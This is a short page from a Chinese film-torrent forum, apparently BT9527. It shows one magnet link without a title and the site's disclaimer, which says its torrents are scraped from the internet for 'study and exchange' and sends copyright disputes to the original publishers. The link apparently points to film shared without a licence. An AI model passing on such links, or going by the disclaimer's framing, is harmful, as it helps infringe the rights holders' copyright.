磁力链:
  • magnet:?xt=urn:btih:30707BD5E1EC759F67E23B6CB9BC13C22B45C677
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回